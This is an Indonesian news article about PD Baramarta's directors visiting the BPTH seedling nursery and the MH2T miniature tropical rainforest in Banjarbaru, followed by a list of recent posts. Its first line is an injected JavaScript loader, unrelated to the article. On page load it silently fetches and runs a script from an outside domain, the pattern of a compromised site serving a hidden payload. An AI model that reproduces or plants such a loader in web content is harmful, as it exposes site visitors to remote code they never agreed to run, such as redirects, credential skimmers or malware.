(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DISHUT PROV KALSEL

Direksi Baramarta Kunjungi Persemaian Permanen dan MH2T


BANJARBARU, Geliat Persemaian Permanen BPTH (Balai Perbenihan Tanaman Hutan), dalam mendukung Gerakan Revolusi Hijau rupanya menggelitik jajaran Direksi PD Baramarta, sebuah perusahaan atau Badan Umum Milik Daerah (BUMD) Kabupaten Banjar.

Selasa (25/6), ketua dewan pengawas perusahaan daerah ini, Nasrunsyah melalui komentarnya di facebook BPTH, menyatakan berkeinginan untuk berkunjung ke persemaian permanen di kawasan Perkantoran Sekretariat Daerah Provinsi Kalsel di Jalan Abdi Praja Banjarbaru.

Gayung bersambut, Kepala BPTH, Ainun Jariah mengapresiasi keinginan itu dengan mempersiapkan kunjungan di hari Kamis (27/6). Nasrunsyah yang pernah menjabat sebagai Sekretaris Daerah Kabupaten Banjar, datang dengan mengajak Direktur dan Sekretaris PD Baramarta.

Didampingi Ainun dan staf, Nasrun sapaannya, berkeliling melihat sarana dan prasarana persemaian, bibit-bibit yang diproduksi dan rangkaian kegiatan pemeliharaan rutin yang dilakukan oleh pekerja di persemaian.

Ainun menjelaskan bahwa persemaiannya dibuat untuk memenuhi kebutuhan bibit se-Kalsel, terutama mendukung gerakan Revjo Kalsel. “Selain itu, distribusi bibit juga dilakukan untuk memenuhi berbagai kegiatan lain. Seperti ASN menanam, untuk kebutuhan Kelompok Tani Hutan (KTH) menanam di tiap-tiap Kesatuan Pengelolaan Hutan (KPH), penghijauan lingkungan ataupun berbagai even kegiatan menanam lain,” tuturnya.

Dikatakan Nasrun, ia terkesan dengan keseriusan Kepala Dinas Kehutanan Kalsel, Hanif Faisol Nurofiq dalam menyiapkan fundamental dasar kegiatan rehabilitasi hutan, berupa bibit tanaman di persemaian ini. Karenanya, ia juga memberikan suntikan semangat dengan membagi pengalamannya sebagai sesama rimbawan.

Di akhir kunjungan, Nasrun dan rombongan berkesempatan melihat langsung areal Miniatur Hutan Hujan Tropika (MH2T). “Tanaman endemik, khususnya lokal Kalimantan di MH2T agar diperbanyak. Selain fungsi kelestarian, nantinya tegakan pohon dapat dijadikan sumber benih,” sarannya.

Ditambahkan, agar pihak pengelola MH2T melakukan penjajakan kerja sama dengan Tempat Pembuangan Akhir (TPA) Cahaya Kencana di Kecamatan Padang Panjang Kabupaten Banjar. “Kerja sama ini terkait penyediaan kompos dengan harga murah untuk pemeliharaan tanaman MH2T,” ujarnya.

Sebagai buah tangan, ia juga dibekali bibit tanaman jenis durian, kemiri dan jengkol. “Terima kasih atas sambutannya di sini, ke-15 bibit ini akan kami bagikan ke setiap masyarakat yang ditemui, baik itu di warung atau dimanapun. Karena selepas dari kunjungan ini, kami akan memantau kegiatan rehabilitasi daerah aliran sungai (rehab DAS) yang dilakukan PD Baramarta di Kecamatan Sungai Pinang,” tutupnya. (bpth)

Reporter : Bpth
Editor : Chell

Desy Arfianty

Recent Posts

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

2 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

2 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

4 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

6 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

7 jam ago

Waket I DPRD Kapuas Apresiasi Pawai Budaya

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Ketua I DPRD Kabupaten Kapuas Yohanes sangat mengapresiasi kegiatan pawai… Read More

7 jam ago

This website uses cookies.